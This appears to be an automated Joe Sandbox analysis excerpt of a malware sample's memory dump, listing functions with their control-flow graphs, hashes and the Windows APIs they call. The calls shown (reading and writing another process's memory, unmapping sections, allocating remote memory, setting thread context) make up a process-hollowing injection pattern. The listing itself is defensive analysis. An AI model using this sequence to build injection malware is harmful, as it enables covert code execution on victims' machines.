                                                • Snapshot File: hcaresult_14_2_1c0000_msimages.jbxd
                                                Similarity
                                                • API ID: MemoryVirtualWrite
                                                • String ID:
                                                • API String ID: 3527976591-0
                                                • Opcode ID: af199e1819824cae48501d675bd85af3f8ed892a68861a4c09dd614197bdd130
                                                • Instruction ID: 146d8865417c4767a21b193fc83ddc5ecc9243c8aeb0ba007ef85aa678b716ae
                                                • Opcode Fuzzy Hash: af199e1819824cae48501d675bd85af3f8ed892a68861a4c09dd614197bdd130
                                                • Instruction Fuzzy Hash: 8841BCB5D012589FDF00CFA9D984AEEFBF1BF49310F20942AE818B7250D335AA45CB64
                                                Function 001C6250 Relevance: 1.6, APIs: 1, Instructions: 109nativeCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 798 1c6250-1c631a NtReadVirtualMemory 801 1c631c-1c6322 798->801 802 1c6323-1c6375 798->802 801->802
                                                APIs
                                                • NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 001C630A
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.401724959.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_1c0000_msimages.jbxd
                                                Similarity
                                                • API ID: MemoryReadVirtual
                                                • String ID:
                                                • API String ID: 2834387570-0
                                                • Opcode ID: 54800dc15f6ef81f5577becb2ed9ba0a6d208a0af3a6ce1dd82731e85ffc65b7
                                                • Instruction ID: 28144950727056d605637c7ef4edf72ccd9226a5b086e4b0e14da37935471b6b
                                                • Opcode Fuzzy Hash: 54800dc15f6ef81f5577becb2ed9ba0a6d208a0af3a6ce1dd82731e85ffc65b7
                                                • Instruction Fuzzy Hash: 2041AAB5D042589FDF10CFA9D884AEEFBB1BF59310F10A42AE818B7250D735AA45CF64
                                                Function 001C6258 Relevance: 1.6, APIs: 1, Instructions: 106nativeCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 807 1c6258-1c631a NtReadVirtualMemory 810 1c631c-1c6322 807->810 811 1c6323-1c6375 807->811 810->811
                                                APIs
                                                • NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 001C630A
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.401724959.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_1c0000_msimages.jbxd
                                                Similarity
                                                • API ID: MemoryReadVirtual
                                                • String ID:
                                                • API String ID: 2834387570-0
                                                • Opcode ID: a8ee3af4390d804d94caa60f6da15bc168d4ec01c3577567a1f2d6aab2093b16
                                                • Instruction ID: f432887ec4c8fde236b397ac25e27cd76da87463d2bd66236ca82ddeb9fb6cd7
                                                • Opcode Fuzzy Hash: a8ee3af4390d804d94caa60f6da15bc168d4ec01c3577567a1f2d6aab2093b16
                                                • Instruction Fuzzy Hash: 9F419BB5D002589FDF10CFA9D884AEEFBB1BF59310F10A42AE818B7250D735AA45CF64
                                                Function 001C66F9 Relevance: 1.6, APIs: 1, Instructions: 97nativethreadCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 834 1c66f9-1c6760 836 1c6777-1c67bf NtSetContextThread 834->836 837 1c6762-1c6774 834->837 839 1c67c8-1c6814 836->839 840 1c67c1-1c67c7 836->840 837->836 840->839
                                                APIs
                                                • NtSetContextThread.NTDLL(?,?), ref: 001C67AF
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.401724959.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_1c0000_msimages.jbxd
                                                Similarity
                                                • API ID: ContextThread
                                                • String ID:
                                                • API String ID: 1591575202-0
                                                • Opcode ID: f9cc101d02a74df0897ef57727c9824fda666eb8b02740e394f30000b809904f
                                                • Instruction ID: d4b721fc6b9e133b36d4b5d79cea59c90945e546030fd69b2651c439aaec4a3d
                                                • Opcode Fuzzy Hash: f9cc101d02a74df0897ef57727c9824fda666eb8b02740e394f30000b809904f
                                                • Instruction Fuzzy Hash: 2841BDB5D002589FDB10CFA9D984AEEBBF1AF88314F24842AE418B7250D7389A45CF54
                                                Function 001C6700 Relevance: 1.6, APIs: 1, Instructions: 94nativethreadCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 845 1c6700-1c6760 847 1c6777-1c67bf NtSetContextThread 845->847 848 1c6762-1c6774 845->848 850 1c67c8-1c6814 847->850 851 1c67c1-1c67c7 847->851 848->847 851->850
                                                APIs
                                                • NtSetContextThread.NTDLL(?,?), ref: 001C67AF
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.401724959.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_1c0000_msimages.jbxd
                                                Similarity
                                                • API ID: ContextThread
                                                • String ID:
                                                • API String ID: 1591575202-0
                                                • Opcode ID: 1b387b6ee57c6a0fc9b0b2f650b0b0010a02ef2a34cf976e87d3171af69c321f
                                                • Instruction ID: c7c345c9b7da5a8c3c8a0c1506fa3fbdc875cda11db4df8ad6e4660511d25305
                                                • Opcode Fuzzy Hash: 1b387b6ee57c6a0fc9b0b2f650b0b0010a02ef2a34cf976e87d3171af69c321f
                                                • Instruction Fuzzy Hash: CD31ACB5D002589FDB14CFA9D884AEEFBF1BF89314F24842AE418B7250D778AA45CF54
                                                Function 001C6381 Relevance: 1.6, APIs: 1, Instructions: 84nativeCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 856 1c6381-1c6421 NtUnmapViewOfSection 859 1c642a-1c646e 856->859 860 1c6423-1c6429 856->860 860->859
                                                APIs
                                                • NtUnmapViewOfSection.NTDLL(?,?), ref: 001C6411
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.401724959.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_1c0000_msimages.jbxd
                                                Similarity
                                                • API ID: SectionUnmapView
                                                • String ID:
                                                • API String ID: 498011366-0
                                                • Opcode ID: a674ca37d78e72cf22fba3fa885c1f67b48d1d68216af6303a497599d7d356ac
                                                • Instruction ID: 82e58cda8b80c85de2cc24fcde99d00f6a02c5354751d7045f7c1ddf0871e916
                                                • Opcode Fuzzy Hash: a674ca37d78e72cf22fba3fa885c1f67b48d1d68216af6303a497599d7d356ac
                                                • Instruction Fuzzy Hash: 2031ECB4D052189FDF10CFA9E884AEEFBB1BF89310F20942AE805B7200C375AA45CF54
                                                Function 001C6388 Relevance: 1.6, APIs: 1, Instructions: 80nativeCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 865 1c6388-1c6421 NtUnmapViewOfSection 868 1c642a-1c646e 865->868 869 1c6423-1c6429 865->869 869->868
                                                APIs
                                                • NtUnmapViewOfSection.NTDLL(?,?), ref: 001C6411
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.401724959.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_1c0000_msimages.jbxd
                                                Similarity
                                                • API ID: SectionUnmapView
                                                • String ID:
                                                • API String ID: 498011366-0
                                                • Opcode ID: 76c7d9fc2c3716161544143fc3a57c116b9e13223ddce2a9f485ecb41fa7ea7f
                                                • Instruction ID: 4d85b0bb4d490d012885c4455c343cfa6422415b8e1568fc961387a33bfe001d
                                                • Opcode Fuzzy Hash: 76c7d9fc2c3716161544143fc3a57c116b9e13223ddce2a9f485ecb41fa7ea7f
                                                • Instruction Fuzzy Hash: AF31BBB4D012189FDF14CFA9D984A9EFBB1FF89310F20942AE815B7210D775AA45CF94
                                                Function 001C6481 Relevance: 1.6, APIs: 1, Instructions: 103memoryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 816 1c6481-1c6542 VirtualAllocEx 819 1c654b-1c6595 816->819 820 1c6544-1c654a 816->820 820->819
                                                APIs
                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 001C6532
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.401724959.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_1c0000_msimages.jbxd
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID:
                                                • API String ID: 4275171209-0
                                                • Opcode ID: da555dbb34192a0a13fa5f2ea3d22cb6b13f81c65b40ac364401b4e93ebde781
                                                • Instruction ID: 1c659a1d6ebdfc087ce2c65a71b206c56fb8a70b83127cec78785c833f4e918b
                                                • Opcode Fuzzy Hash: da555dbb34192a0a13fa5f2ea3d22cb6b13f81c65b40ac364401b4e93ebde781
                                                • Instruction Fuzzy Hash: 9A319AB5D042589FCF10CFA9D984AEEFBB1BF59310F20942AE814B7210D335AA45CF55
                                                Function 001C6488 Relevance: 1.6, APIs: 1, Instructions: 101memoryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 825 1c6488-1c6542 VirtualAllocEx 828 1c654b-1c6595 825->828 829 1c6544-1c654a 825->829 829->828
                                                APIs
                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 001C6532
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.401724959.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_1c0000_msimages.jbxd
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID:
                                                • API String ID: 4275171209-0
                                                • Opcode ID: 8a8645d71e58178bbd0d46921ae819025ed06215cd4e7cc978f612a7499c0f95
                                                • Instruction ID: 84942ece25106d7f297bb178dfbdcd80f30522dca15a75daeea8a09c8278d2df
                                                • Opcode Fuzzy Hash: 8a8645d71e58178bbd0d46921ae819025ed06215cd4e7cc978f612a7499c0f95
                                                • Instruction Fuzzy Hash: FE319AB5D002589FCF10CFA9D984AEEFBB1BF59310F20942AE815B7210D735AA46CF64